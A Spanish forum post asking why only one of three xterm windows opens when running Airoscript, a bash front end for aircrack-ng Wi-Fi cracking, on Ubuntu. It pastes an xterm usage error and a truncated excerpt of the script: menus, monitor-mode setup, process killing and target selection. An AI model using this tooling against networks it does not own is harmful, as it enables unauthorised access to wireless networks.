Buenas a todos. Estos días he intentado portar el Airoscript nuevo de Wifiway a Ubuntu y todo funciona bien: se abre, pone la tarjeta en modo monitor, escanea y desautentica. Pero cuando intento realizar un ataque cualquiera, solo me salta la ventana de captura de datos; las otras dos no salen, y me sale esto:
[spoiler=error que se muestra]XTerm(271) usage:
xterm [-options ...] [-e command args]
where options include:
-/+132 turn on/off 80/132 column switching
XTerm(271) usage:
-C intercept console messages
xterm [-options ...] [-e command args]
-Sccn slave mode on "ttycc", file descriptor "n"
where options include:
-T string title name for window
-/+132 turn on/off 80/132 column switching
-/+ah turn on/off always highlight
-C intercept console messages
-/+ai turn off/on active icon
-Sccn slave mode on "ttycc", file descriptor "n"
-/+aw turn on/off auto wraparound
-T string title name for window
-b number internal border in pixels
-/+ah turn on/off always highlight
-/+bc turn on/off text cursor blinking
-/+ai turn off/on active icon
-bcf milliseconds time text cursor is off when blinking
-/+aw turn on/off auto wraparound
-bcn milliseconds time text cursor is on when blinking
-b number internal border in pixels
-bd color border color
-/+bc turn on/off text cursor blinking
-/+bdc turn off/on display of bold as color
-bcf milliseconds time text cursor is off when blinking
-bg color background color
-bcn milliseconds time text cursor is on when blinking
-bw number border width in pixels
-bd color border color
-/+cb turn on/off cut-to-beginning-of-line inhibit
-/+bdc turn off/on display of bold as color
-cc classrange specify additional character classes
-bg color background color
-/+cjk_width turn on/off legacy CJK width convention
-bw number border width in pixels
-class string class string (XTerm)
-/+cb turn on/off cut-to-beginning-of-line inhibit
-cc classrange specify additional character classes
-/+cjk_width turn on/off legacy CJK width convention
-class string class string (XTerm)
-/+cm turn off/on ANSI color mode
-/+cn turn on/off cut newline inhibit
-cr color text cursor color
-/+cu turn on/off curses emulation
-/+dc turn off/on dynamic color selection
-display displayname X server to contact
-e command args ... command to execute
-fa pattern FreeType font-selection pattern
-/+cm turn off/on ANSI color mode
-fb fontname bold text font
-/+cn turn on/off cut newline inhibit
-/+fbb turn on/off normal/bold font comparison inhibit
-cr color text cursor color
-/+fbx turn off/on linedrawing characters
-/+cu turn on/off curses emulation
-fd pattern FreeType Doublesize font-selection pattern
-/+dc turn off/on dynamic color selection
-fg color foreground color
-display displayname X server to contact
-fi fontname icon font for active icon
-e command args ... command to execute
-fn fontname normal text font
-fa pattern FreeType font-selection pattern
-fs size FreeType font-size
-fb fontname bold text font
-/+fullscreen turn on/off fullscreen on startup
-/+fbb turn on/off normal/bold font comparison inhibit
-fw fontname doublewidth text font
-/+fbx turn off/on linedrawing characters
-fwb fontname doublewidth bold text font
-fd pattern FreeType Doublesize font-selection pattern
-fx fontname XIM fontset
-fg color foreground color
%geom Tek window geometry
-fi fontname icon font for active icon
-fn fontname normal text font
-fs size FreeType font-size
-/+fullscreen turn on/off fullscreen on startup
-fw fontname doublewidth text font
-fwb fontname doublewidth bold text font
-fx fontname XIM fontset
%geom Tek window geometry
#geom icon window geometry
-geometry geom size (in characters) and position
-help print out this message
-/+hm turn on/off selection-color override
-/+hold turn on/off logic that retains window after exit
-iconic start iconic
-/+ie turn on/off initialization of 'erase' from pty
-/+im use insert mode for TERMCAP
-into windowId use the window id given to -into as the parent window rather than the default root window
-/+j turn on/off jump scroll
-/+k8 turn on/off C1-printable classification
-kt keyboardtype set keyboard type: tcap sun vt220
-/+l turn on/off logging
-/+lc turn on/off locale mode using luit
-lcc path filename of locale converter (/usr/bin/luit)
-leftbar force scrollbar left
-lf filename logging filename
-/+ls turn on/off login shell
-/+maximized turn on/off maxmize on startup
-/+mb turn on/off margin bell
-mc milliseconds multiclick time in milliseconds
-/+mesg forbid/allow messages
-/+mk_width turn on/off simple width convention
-ms color pointer color
-n string icon name for window
-name string client instance, icon, and title strings
-nb number margin bell in characters from right end
-/+nul turn off/on display of underlining
-/+pc turn on/off PC-style bold colors
-/+pob turn on/off pop on bell
-rightbar force scrollbar right (default left)
-/+rv turn on/off reverse video
-/+rvc turn off/on display of reverse as color
-/+rw turn on/off reverse wraparound
-/+s turn on/off multiscroll
-/+samename turn on/off the no-flicker option for title and icon name
-/+sb turn on/off scrollbar
-selbg color selection background color
-selfg color selection foreground color
-/+sf turn on/off Sun Function Key escape codes
-/+si turn on/off scroll-on-tty-output inhibit
-/+sk turn on/off scroll-on-keypress
-sl number number of scrolled lines to save
-/+sm turn on/off the session-management support
-/+sp turn on/off Sun/PC Function/Keypad mapping
-/+t turn on/off Tek emulation window
-ti termid terminal identifier
-title string title string
-tm string terminal mode keywords and characters
-tn name TERM environment variable name
-/+u8 turn on/off UTF-8 mode (implies wide-characters)
-/+uc turn on/off underline cursor
-/+ulc turn off/on display of underline as color
-/+ulit turn off/on display of underline as italics
-/+ut turn on/off utmp support
-/+vb turn on/off visual bell
-version print the version number
-/+wc turn on/off wide-character mode
-/+wf turn on/off wait for map before command exec
-xrm resourcestring additional resource specifications
-ziconbeep percent beep and flag icon of window having hidden output
Fonts should be fixed width and, if both normal and bold are specified, should
have the same size. If only a normal font is specified, it will be used for
both normal and bold text (by doing overstriking). The -e option, if given,
must appear at the end of the command line, otherwise the user's default shell
will be started. Options that start with a plus sign (+) restore the default.
#geom icon window geometry
-geometry geom size (in characters) and position
-help print out this message
-/+hm turn on/off selection-color override
-/+hold turn on/off logic that retains window after exit
-iconic start iconic
-/+ie turn on/off initialization of 'erase' from pty
-/+im use insert mode for TERMCAP
-into windowId use the window id given to -into as the parent window rather than the default root window
-/+j turn on/off jump scroll
-/+k8 turn on/off C1-printable classification
-kt keyboardtype set keyboard type: tcap sun vt220
-/+l turn on/off logging
-/+lc turn on/off locale mode using luit
-lcc path filename of locale converter (/usr/bin/luit)
-leftbar force scrollbar left
-lf filename logging filename
-/+ls turn on/off login shell
-/+maximized turn on/off maxmize on startup
-/+mb turn on/off margin bell
-mc milliseconds multiclick time in milliseconds
-/+mesg forbid/allow messages
-/+mk_width turn on/off simple width convention
-ms color pointer color
-n string icon name for window
-name string client instance, icon, and title strings
-nb number margin bell in characters from right end
-/+nul turn off/on display of underlining
-/+pc turn on/off PC-style bold colors
-/+pob turn on/off pop on bell
-rightbar force scrollbar right (default left)
-/+rv turn on/off reverse video
-/+rvc turn off/on display of reverse as color
-/+rw turn on/off reverse wraparound
-/+s turn on/off multiscroll
-/+samename turn on/off the no-flicker option for title and icon name
-/+sb turn on/off scrollbar
-selbg color selection background color
-selfg color selection foreground color
-/+sf turn on/off Sun Function Key escape codes
-/+si turn on/off scroll-on-tty-output inhibit
-/+sk turn on/off scroll-on-keypress
-sl number number of scrolled lines to save
-/+sm turn on/off the session-management support
-/+sp turn on/off Sun/PC Function/Keypad mapping
-/+t turn on/off Tek emulation window
-ti termid terminal identifier
-title string title string
-tm string terminal mode keywords and characters
-tn name TERM environment variable name
-/+u8 turn on/off UTF-8 mode (implies wide-characters)
-/+uc turn on/off underline cursor
-/+ulc turn off/on display of underline as color
-/+ulit turn off/on display of underline as italics
-/+ut turn on/off utmp support
-/+vb turn on/off visual bell
-version print the version number
-/+wc turn on/off wide-character mode
-/+wf turn on/off wait for map before command exec
-xrm resourcestring additional resource specifications
-ziconbeep percent beep and flag icon of window having hidden output
Fonts should be fixed width and, if both normal and bold are specified, should
have the same size. If only a normal font is specified, it will be used for
both normal and bold text (by doing overstriking). The -e option, if given,
must appear at the end of the command line, otherwise the user's default shell
will be started. Options that start with a plus sign (+) restore the default.[/spoiler]
Por si acaso, os dejo el código fuente del Airoscript que tengo (las rutas establecidas las tengo bien y tengo la suite aircrack-ng, mdk3, konsole, kommander, xterm, macchanger, wireless-tools...):
[spoiler=Codigo fuente Airoscript]#! /bin/bash
# Program: Airoscript
# Version: sw2.2 beta 7
# Authors: Base Code by Daouid
# Mods & Tweaks by CurioCT and others
# Traducción y mejoras añadidas realizadas Por Chinitiw, elmanuvolador, alist3r y USUARIONUEVO para Seguridad Wireless
# Credits: Hirte, Befa, Stouf, Mister_X, ASPj , Andrea, Pilotsnipes, darkAudax, Atheros support thx to green-freq
#
# Version of aircrack-ng required: AIRCRACK-NG 1.1
# Dependencies: aircrack-ng, xterm, grep, awk, macchanger, drivers capable of injection, mdk3 (optional)
# Start from an empty terminal before any menu is drawn.
clear
## GLOBAL VARS
# Debug switch. Per the original note it lets every xterm window stay on screen
# after the command inside it has finished. The code that reads DEBUG is not in
# this part of the file -- presumably it feeds the $HOLD word passed to xterm
# further down (TODO confirm).
DEBUG="0"
## PATHS TO BINARIES
# CardCtl executable (on 2.4 kernels, it is cardctl). Used by cleanup to
# eject/insert the card.
CARDCTL="pccardctl"
# DHCP client utility.
DHCPSOFT="dhcpcd"
## PATH TO FILES AND FOLDERS
# NOTE(review): every path below is absolute and tied to one user's home
# directory (/home/vk496); they must be adjusted when the script runs under
# another account or on another machine.
# Cracked keys will be stored here.
KEYS="/home/vk496/swireless/airoscript/keys"
# The path where the captured data is stored (FOLDER MUST EXIST !).
# Files are written here under fixed names (dump-01.csv, dump-02.csv,
# <MAC>-01.cap, <MAC>.key), so the folder should be writable only by the
# user running the script.
DUMP_PATH="/home/vk496/swireless/airoscript/capturas"
# Path where ARP-forged packets are stored (same folder as DUMP_PATH here).
ARP_PATH="/home/vk496/swireless/airoscript/capturas"
# Path to the temporary wordlist file (for WPA and WEP dictionary attack).
WORDLIST_FOLDER="/home/vk496/swireless/airoscript/wordlist"
WORDLIST_PATH="$WORDLIST_FOLDER"/wordlist
## AIRCRACK FINE-TUNING
# This is the rate per second at which packets will be injected.
INJECTRATE="350"
# How many times the deauth attack is run.
DEAUTHTIME="5"
# Time between re-association with target AP.
AUTHDELAY="200"
# Keep-alive value; its consumer is not in this part of the file
# (presumably the fake-authentication keep-alive interval -- TODO confirm).
KEEPALIVE="120"
# Fudge factor setting.
FUDGEFACTOR="2"
# IP of the AP and clients to be used for CHOPCHOP and Fragmentation attack.
# Host_IP and Client_IP used for arp generation from xor file (frag and chopchop).
Host_IP="192.168.1.1"
Client_IP="192.168.1.33"
# Fragmentation IP.
FRAG_HOST_IP="192.168.1.1"
FRAG_CLIENT_IP="192.168.1.37"
## ---8<---8<--- DONT EDIT ANYTHING PAST THIS LINE
# Draw the main menu.
# Calls target first, which clears the screen and prints the interface /
# target summary, then lists the ten top-level choices followed by one
# empty line. Reading the user's choice is done by the caller.
menu() {
  target
  printf '%s\n' \
    "MENU PRINCIPAL" \
    " " \
    " 1) Escanear -Buscar Objetivos " \
    " 2) Seleccionar -Seleccionar Objetivo " \
    " 3) Ataques -Atacar Objetivo " \
    " 4) Auditar -Menu Auditar " \
    " 5) Auto -Buscar Key Automaticamente " \
    " 6) Autenticar -Cliente Falso en Objetivo " \
    " 7) Desautenticar -Desautenticar del Objetivo " \
    " 8) Inyección -Menu de Inyección " \
    " 9) Opciones Avanzadas -Utilidades Varias " \
    " 10) Salir -Cerrar Airoscript " \
    ""
}
# Detect the resolution of X screen #0 and load the matching xterm geometry
# preset (resA..resE).
# Globals:  detectedresolution (written) -- third space-separated field of the
#           "dimensions" line that xdpyinfo prints for screen #0.
# Outputs:  a progress message followed by the detected value on stdout.
# Presets:  1024x600 -> A, 1024x768 -> B, 1280x768 and 1366x768 -> C,
#           1280x1024 -> D, 1600x1200 -> E. Anything else, including an empty
#           result when xdpyinfo prints nothing, falls back to preset A.
setresolution() {
  printf '%s' "Autodetectando Resolución..."
  detectedresolution=$(
    xdpyinfo \
      | grep -A 3 "screen #0" \
      | grep dimensions \
      | tr -s " " \
      | cut -d" " -f 3
  )
  echo $detectedresolution
  case $detectedresolution in
    "1024x600") resA ;;
    "1024x768") resB ;;
    "1280x768" | "1366x768") resC ;;
    "1280x1024") resD ;;
    "1600x1200") resE ;;
    *) resA ;; # safe fallback
  esac
}
# Geometry preset A: selected by setresolution for 1024x600 and as the
# fallback. Each value is a complete "-geometry COLSxROWS<position>" argument
# pair for xterm; callers expand it unquoted so that it splits into two words.
# Position suffixes: +0+0 upper left, -0+0 upper right, +0-0 bottom left,
# -0-0 bottom right.
resA() {
  TOPLEFTBIG="-geometry 91x42+0+0"
  TOPRIGHTBIG="-geometry 83x26-0+0"
  TOPLEFT="-geometry 90x13+0+0"       # upper left
  TOPRIGHT="-geometry 83x26-0+0"      # upper right
  BOTTOMLEFT="-geometry 90x24+0-0"    # bottom left
  BOTTOMRIGHT="-geometry 75x12-0-0"   # bottom right
}
# Geometry preset B: selected by setresolution for 1024x768. Each value is a
# complete "-geometry COLSxROWS<position>" argument pair for xterm; callers
# expand it unquoted so that it splits into two words.
resB() {
  TOPLEFTBIG="-geometry 100x52+0+0"
  TOPRIGHTBIG="-geometry 74x30-0+0"
  TOPLEFT="-geometry 92x14+0+0"       # upper left
  TOPRIGHT="-geometry 68x25-0+0"      # upper right
  BOTTOMLEFT="-geometry 92x36+0-0"    # bottom left
  BOTTOMRIGHT="-geometry 74x20-0-0"   # bottom right
}
# Geometry preset C: selected by setresolution for 1280x768 and 1366x768.
# Each value is a complete "-geometry COLSxROWS<position>" argument pair for
# xterm; callers expand it unquoted so that it splits into two words.
resC() {
  TOPLEFTBIG="-geometry 100x52+0+0"
  TOPRIGHTBIG="-geometry 109x30-0+0"
  TOPLEFT="-geometry 100x20+0+0"      # upper left
  TOPRIGHT="-geometry 109x20-0+0"     # upper right
  BOTTOMLEFT="-geometry 100x30+0-0"   # bottom left
  BOTTOMRIGHT="-geometry 109x20-0-0"  # bottom right
}
# Geometry preset D: selected by setresolution for 1280x1024. Each value is a
# complete "-geometry COLSxROWS<position>" argument pair for xterm; callers
# expand it unquoted so that it splits into two words.
resD() {
  TOPLEFTBIG="-geometry 110x72+0+0"
  TOPRIGHTBIG="-geometry 99x40-0+0"
  TOPLEFT="-geometry 110x35+0+0"      # upper left
  TOPRIGHT="-geometry 99x40-0+0"      # upper right
  BOTTOMLEFT="-geometry 110x35+0-0"   # bottom left
  BOTTOMRIGHT="-geometry 99x30-0-0"   # bottom right
}
# Geometry preset E: selected by setresolution for 1600x1200. Each value is a
# complete "-geometry COLSxROWS<position>" argument pair for xterm; callers
# expand it unquoted so that it splits into two words.
resE() {
  TOPLEFTBIG="-geometry 130x85+0+0"
  TOPRIGHTBIG="-geometry 132x48-0+0"
  TOPLEFT="-geometry 130x43+0+0"      # upper left
  TOPRIGHT="-geometry 68x25-0+0"      # upper right
  BOTTOMLEFT="-geometry 130x40+0-0"   # bottom left
  BOTTOMRIGHT="-geometry 132x35-0-0"  # bottom right
}
# Open an xterm that runs "airmon-ng check" for the current interface, print
# an empty line and go back to the options menu.
# Globals: WIFI (read, expanded unquoted so an empty value adds no argument).
airmoncheck() {
  xterm -e airmon-ng check $WIFI
  printf '\n'
  optionmenu
}
# Tune the working interface to the selected access point's channel.
# Globals: WIFI, Host_CHAN (read). Both are expanded unquoted, so surrounding
# whitespace in the values is dropped by word splitting.
monitor_interface2() {
  iwconfig $WIFI channel $Host_CHAN
}
# Let the user pick a network interface (only when none has been chosen yet),
# hand it to the handler for its current mode, then redraw the main menu.
# Globals: INTERFACES, WIFI2, WIFI2MODE (written); WIFI2 (read).
function setinterface {
# Interface names taken from the numbered lines of "ip link", minus every
# line that contains "lo".
# NOTE(review): grep -v lo drops any name containing "lo", not only the
# loopback device.
INTERFACES=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'} |grep -v lo`
if [ "$WIFI2" = "" ]
then
echo "Selecciona una interface: "
echo ""
# Interactive numbered prompt; the loop leaves after the first answer, so an
# out-of-range answer leaves WIFI2 empty.
select WIFI2 in $INTERFACES; do
break;
done
sleep 1
# Value after "Mode:" in the iwconfig output; empty when there is no such line.
WIFI2MODE=$(iwconfig $WIFI2 | grep Mode | awk '{print $1,$4,$3}' | awk 'BEGIN { FS = ":" } ; { print $2}' | awk '{print $1}')
# Dynamic dispatch: runs the function named "mode" + detected mode. The
# visible handlers are modeManaged, modeMonitor and plain "mode" (empty
# mode, i.e. not a wireless interface).
# NOTE(review): any other mode string resolves to a name with no matching
# function in the visible part of the file.
mode$WIFI2MODE
# Redirection without a command; it has no visible effect.
>&1 > /dev/null
detectarmac
info
else
# Placeholder so the else branch is not empty.
foo=foo
fi
clear
menu
}
# Handler reached from setinterface when no mode could be read for the chosen
# interface: report it, wait two seconds and run setinterface again.
mode() {
  printf '%s\n' "Interface no válida, elige de nuevo"
  sleep 2
  setinterface
}
# Handler for an interface that is in managed mode: ask whether to switch it
# to monitor mode and with which driver family, repeating until a valid
# choice is typed.
# Choices: 1 -> drivers-compat, 2 -> drivers-madwifi, 3 -> drivers-otros,
#          4 -> modeMonitor (keep the interface as it is).
# Globals: yn (written with the raw answer).
modeManaged() {
  while :; do
    clear
    printf '%s\n' \
      "AVISO" \
      "" \
      " Interface en modo managed " \
      " Desea activar modo monitor? " \
      " " \
      " 1) Si (compat wireless) " \
      " 2) Si (Atheros madwifi) " \
      " 3) Si (otros drivers) " \
      " 4) No " \
      " "
    printf '%s' " #> "
    read yn
    clear
    case $yn in
      1) drivers-compat; break ;;
      2) drivers-madwifi; break ;;
      3) drivers-otros; break ;;
      4) modeMonitor; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
}
# Use the selected interface as it is (no mode change) and record its chipset
# and driver as listed by airmon-ng.
# Globals: WIFI2 (read); TYPE, DRIVER, WIFI (written).
#   TYPE   - 2nd column of the airmon-ng line for WIFI2, cut at the first "-"
#   DRIVER - 3rd and 5th columns of that line, cut at the first "["
modeMonitor() {
  TYPE=$(airmon-ng | grep $WIFI2 | awk '{print $2}' | cut -d "-" -f1)
  DRIVER=$(airmon-ng | grep $WIFI2 | awk '{print $3,$5}' | cut -d "[" -f1)
  WIFI=$WIFI2
}
# Put WIFI2 into monitor mode through "airmon-ng start", record the chipset,
# driver and resulting monitor interface, then stop services and kill
# processes that airmon-ng reports as using the card.
# Globals: WIFI2 (read); AIROUTPUT, TYPE, DRIVER, tmpwifi, WIFI (written).
function drivers-compat {
# Output of "airmon-ng start" without the "running" lines, limited to the
# line naming WIFI2 and the one after it.
AIROUTPUT=$(airmon-ng start $WIFI2|grep -v "running"|grep -A1 $WIFI2);
## echo $AIROUTPUT > airoutputdebug.txt
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'| cut -d "-" -f1`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3,$5}'| cut -d "[" -f1`
# The \" inside backticks produce literal quote characters around an
# unquoted (word-split) expansion, so the text reaches awk as one line. The
# last field, cut at ")", is taken as the monitor interface name.
# NOTE(review): this depends on the exact wording of the airmon-ng message;
# a different airmon-ng output format would leave WIFI wrong or empty.
tmpwifi=`echo \"$AIROUTPUT\" | awk {'print $NF'} | cut -d ")" -f1`
WIFI=$tmpwifi
echo Buscando y matando procesos conflictivos que controlen $WIFI2...
# NOTE(review): distribution-specific rc script path; only stdout is
# silenced, so on a system without this file the shell's error is still shown.
/etc/rc.d/rc.wicd stop > /dev/null
## thanks to pepe10000 for pointing out that WICD respawned; since it is a daemon it is smarter to stop it than to kill it.
# PIDs come from the 4th space-separated field of the "running" lines of
# "airmon-ng check"; each one is sent SIGKILL directly, with no attempt at a
# normal termination first.
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; done
}
# Put WIFI2 into monitor mode through "airmon-ng start" for drivers that keep
# the same interface name, then kill processes that airmon-ng reports as
# using the card.
# Globals: WIFI2 (read); AIROUTPUT, TYPE, DRIVER, WIFI (written).
function drivers-otros {
AIROUTPUT=$(airmon-ng start $WIFI2|grep -v "running"|grep -A1 $WIFI2);
# The \" inside backticks produce literal quote characters around an
# unquoted (word-split) expansion; TYPE and DRIVER are the 2nd and 3rd
# fields of the resulting line if it contains "monitor".
TYPE=`echo \"$AIROUTPUT\" | grep monitor | awk '{print $2}'`
DRIVER=`echo \"$AIROUTPUT\" | grep monitor| awk '{print $3}'`
# The working interface is the selected one; no separate monitor interface
# name is parsed here.
WIFI=$WIFI2
echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
# Each PID reported on a "running" line is sent SIGKILL and then echoed.
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; echo $proceso;done
}
# Monitor-mode setup for the madwifi (ath_pci) driver: destroy the current
# virtual interface, reload the module so that it creates a monitor-mode
# interface by itself, record the new names, then kill processes that
# airmon-ng reports as using the card.
# Globals: WIFI2 (read); WIFI, TYPE, DRIVER (written).
function drivers-madwifi {
wlanconfig $WIFI2 destroy
# Unload and reload the kernel module; both calls need root privileges.
modprobe -r ath_pci
modprobe ath_pci autocreate=monitor
# The working interface is the first column of the airmon-ng line that
# contains "parent".
WIFI=`airmon-ng | grep parent | awk '{print $1}'`
TYPE=`airmon-ng | grep $WIFI2 | awk '{print $2}'`
DRIVER=`airmon-ng | grep $WIFI2| awk '{print $3}'`
echo Buscando y matando procesos conflictivos que controlen $WIFI2"..."
# Each PID reported on a "running" line is sent SIGKILL and then echoed.
for proceso in $(airmon-ng check $WIFI2 | grep running | cut -d " " -f 4); do kill -9 $proceso; echo $proceso;done
}
# Read the current MAC address of the working interface from
# "macchanger -s" (third field of the line containing "Current") and use it
# as the initial value of FAKE_MAC.
# Globals: WIFI (read); realmac, FAKE_MAC (written).
detectarmac() {
  realmac=$(
    macchanger -s $WIFI \
      | grep "Current" \
      | awk '{ print $3 }'
  )
  FAKE_MAC=$realmac
}
# Refresh and print the interface summary shown above the menus.
# Globals read:    WIFI, WIFI2, Host_MAC, TYPE, DRIVER, FAKE_MAC
# Globals written: WIFIMODE, WIFI2MODE  - value after "Mode:" in iwconfig output
#                  Host_MAC_info1       - first three octets of Host_MAC
#                  Host_MAC_MODEL       - "(f5 f6 f7)" from the matching line of
#                                         macchanger's vendor list
# Outputs: six lines on stdout (title, blank, three values, blank).
info() {
  # Interface mode (managed/monitor) for both interface variables.
  WIFIMODE=$(iwconfig $WIFI \
    | grep Mode \
    | awk '{print $1,$4,$3}' \
    | awk 'BEGIN { FS = ":" } ; { print $2}' \
    | awk '{print $1}')
  WIFI2MODE=$(iwconfig $WIFI2 \
    | grep Mode \
    | awk '{print $1,$4,$3}' \
    | awk 'BEGIN { FS = ":" } ; { print $2}' \
    | awk '{print $1}')
  # Access point vendor, looked up by the MAC prefix.
  Host_MAC_info1=$(echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}')
  Host_MAC_MODEL=$(macchanger -l | grep $Host_MAC_info1 | awk '{ print "("$5,$6,$7")" }')
  printf '%s\n' \
    "INFO INTERFAZ" \
    "" \
    " Interfaz = $WIFI / modo $WIFIMODE" \
    " Chipset/Driver = $TYPE $DRIVER" \
    " Tu MAC = $FAKE_MAC" \
    ""
}
# Contribution from CurioCT: when the detected SSID is unusable, ask whether
# to type one by hand. The question repeats until 1 or 2 is answered.
# Choices: 1 -> Host_ssidinput (prompt for the SSID), 2 -> clear Host_SSID.
# Globals: yn (written with the raw answer), Host_SSID (written on choice 2).
blankssid() {
  while :; do
    clear
    printf '%s\n' \
      "SSID INCORRECTO DETECTADO" \
      "" \
      " Desea introducir uno nuevo " \
      " 1) Si " \
      " 2) No " \
      " "
    printf '%s' " #> "
    read yn
    case $yn in
      1) Host_ssidinput; break ;;
      2) Host_SSID=""; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Input half of blankssid: prompt for an SSID and store the typed line in
# Host_SSID. Leading and trailing whitespace is dropped by read; inner
# spaces are kept.
# Globals: Host_SSID (written).
Host_ssidinput() {
  printf '%s\n' " "
  printf '%s' " Introduce el SSID >"
  read Host_SSID
  # Only resets this function's own positional parameters.
  set -- ${Host_SSID}
  clear
}
# This is the function to select Target from a list
## MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room
## And HIRTE for making all those great patch and fixing the SSID issue
# List the access points found in $DUMP_PATH/dump-01.csv, let the user pick
# one by number and copy its fields into the Host_* globals.
# Globals read:    AdvancedESSIDFilter, DUMP_PATH
# Globals written: ap_array, i, assid/achannel/amac/aprivacy/aspeed (arrays),
#                  aidlenght, choice, Host_IDL, Host_SPEED, Host_ENC, Host_MAC,
#                  Host_CHAN, Host_SSID and the per-row read variables.
# Files:           rewrites $DUMP_PATH/dump-02.csv on every call.
function Parseforap {
clear
case $AdvancedESSIDFilter in
"" ) ;;
* ) echo -e "AVISO: Filtro de pantalla por ESSID activado. Patrón filtrado:" $AdvancedESSIDFilter;
echo -e "Puedes desactivar el filtro en Opciones Avanzadas";;
esac
ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
# Finds the CSV line where the AP list ends and the list of connected clients begins.
# NOTE(review): the filter is expanded unquoted as a grep pattern. With an
# empty filter the command becomes "grep -a -", where "-" is parsed as the
# pattern rather than as stdin, so only rows containing a dash pass.
# &> also sends grep's error messages into dump-02.csv.
head -n $ap_array $DUMP_PATH/dump-01.csv | grep -a $AdvancedESSIDFilter - &> $DUMP_PATH/dump-02.csv
# Keeps only the AP list for the array, discarding the client list.
tabs -n 6
echo " Listado de APs Objetivo"
echo ""
echo -e " #\tMAC CN\t SEG\t\t PWR\t #PAQ\t SSID"
echo ""
i=0
# Rows are split on commas only, so any padding spaces in the file stay
# inside the field values. read has no -r: backslashes in a field are
# interpreted, and ESSID text is later printed with echo -e.
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
longueur=${#MAC}
# Only rows whose first field is at least 17 characters long (the length of
# a MAC address) are listed; this skips the header and blank lines.
if [ $longueur -ge 17 ]; then
i=$(($i+1))
echo -e " "$i")\t"$MAC" "$CHANNEL"\t"$PRIVACY" \t"$POWER"\t"$IDLENGTH"\t"$ESSID
# NOTE(review): scalar assignment (element 0 only), overwritten on every
# row, unlike the per-index arrays below.
aidlenght=$IDLENGTH
assid[$i]="$ESSID" # these quotes are part of the fix for SSIDs that contain spaces.
achannel[$i]=$CHANNEL
amac[$i]=$MAC
aprivacy[$i]=$PRIVACY
aspeed[$i]=$SPEED
fi
done < $DUMP_PATH/dump-02.csv
echo ""
echo -n " Selecciona Objetivo> "
# NOTE(review): the answer is used as an array index without any check that
# it is a number within 1..i.
read choice
idlenght=${aidlenght[$choice]}
ssid=${assid[$choice]}
channel=${achannel[$choice]}
mac=${amac[$choice]}
privacy=${aprivacy[$choice]}
speed=${aspeed[$choice]}
# NOTE(review): "idlength" here and in the arithmetic below is a different
# name from "idlenght" assigned above and is not set anywhere in this
# function, so Host_IDL ends up empty unless another part of the file sets it.
Host_IDL=$idlength
Host_SPEED=$speed
Host_ENC=$privacy
Host_MAC=$mac
Host_CHAN=$channel
acouper=${#ssid}
# With idlength unset the subtraction uses 0, so fin is the full length and
# the substring below simply drops the first character of the stored ESSID
# (presumably the space that follows the comma in the CSV -- TODO confirm).
# Do not correct the spelling without re-deriving this arithmetic.
fin=$(($acouper-idlength))
Host_SSID=${ssid:1:fin}
}
# Ask which encryption type the scan should be limited to; repeats until a
# valid number is typed.
# Globals: yn (raw answer), ENCRYPT (written):
#   1 -> ""      2 -> "OPN"   3 -> "WEP"
#   4 -> "WPA1"  5 -> "WPA2"  6 -> "WPA"
choosetype() {
  while :; do
    clear
    printf '%s\n' \
      "SELECCIONA MODO DE BÚSQUEDA" \
      " " \
      " 1) Sin filtros " \
      " 2) OPN " \
      " 3) WEP " \
      " 4) WPA " \
      " 5) WPA2 " \
      " 6) WPA y WPA2 " \
      " "
    printf '%s' " #> "
    read yn
    case $yn in
      1) ENCRYPT=""; break ;;
      2) ENCRYPT="OPN"; break ;;
      3) ENCRYPT="WEP"; break ;;
      4) ENCRYPT="WPA1"; break ;;
      5) ENCRYPT="WPA2"; break ;;
      6) ENCRYPT="WPA"; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Prompt for the SSID display filter used on the target-selection screen.
# An empty answer disables the filter.
# Globals: AdvancedESSIDFilter (written with the typed line).
# NOTE(review): the value is stored as typed; Parseforap later expands it
# unquoted as a grep pattern, so spaces or a leading "-" change how that
# command is parsed.
SetAdvancedESSIDFilter() {
  clear
  printf '%s\n' \
    "INTRODUCE FILTRO DE DISPLAY" \
    "" \
    " Introduce patrón para filtrar " \
    " las redes por SSID. Ejemplos: " \
    " " \
    " * WLAN_ " \
    " * Vodafone " \
    " * ONO " \
    " * Tele2 " \
    " " \
    " (En blanco para desactivar) " \
    " " \
    " NOTA: El filtrado se aplica solo" \
    " en la pantalla de selección de " \
    " objetivo, no durante la captura " \
    " "
  printf '%s' " Patrón >"
  read AdvancedESSIDFilter
  # Only resets this function's own positional parameters.
  set -- ${AdvancedESSIDFilter}
  clear
}
# Ask which fake-authentication method to run; repeats until a valid number
# is typed. Note the mapping is not in numeric order:
#   1 (Estándar) -> fakeauth2, 2 (Conservador) -> fakeauth1,
#   3 (Progresivo) -> fakeauth3.
# Globals: yn (written with the raw answer).
choosefake() {
  while :; do
    clear
    printf '%s\n' \
      "MÉTODO DE AUTENTICACIÓN" \
      " " \
      " 1) Estándar " \
      " 2) Conservador " \
      " 3) Progresivo " \
      " "
    printf '%s' " #> "
    read yn
    case $yn in
      1) fakeauth2; break ;;
      2) fakeauth1; break ;;
      3) fakeauth3; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Ask whether to scan every channel or specific ones; repeats until a valid
# number is typed.
# Choices: 1 -> Scan, 2 -> Scanchan.
# Globals: yn (written with the raw answer).
choosescan() {
  while :; do
    clear
    printf '%s\n' \
      "SELECCIONA CANAL" \
      " " \
      " 1) Todos los canales " \
      " 2) Canal(es) específico(s) " \
      " "
    printf '%s' " #> "
    read yn
    printf '\n'
    case $yn in
      1) Scan; break ;;
      2) Scanchan; break ;;
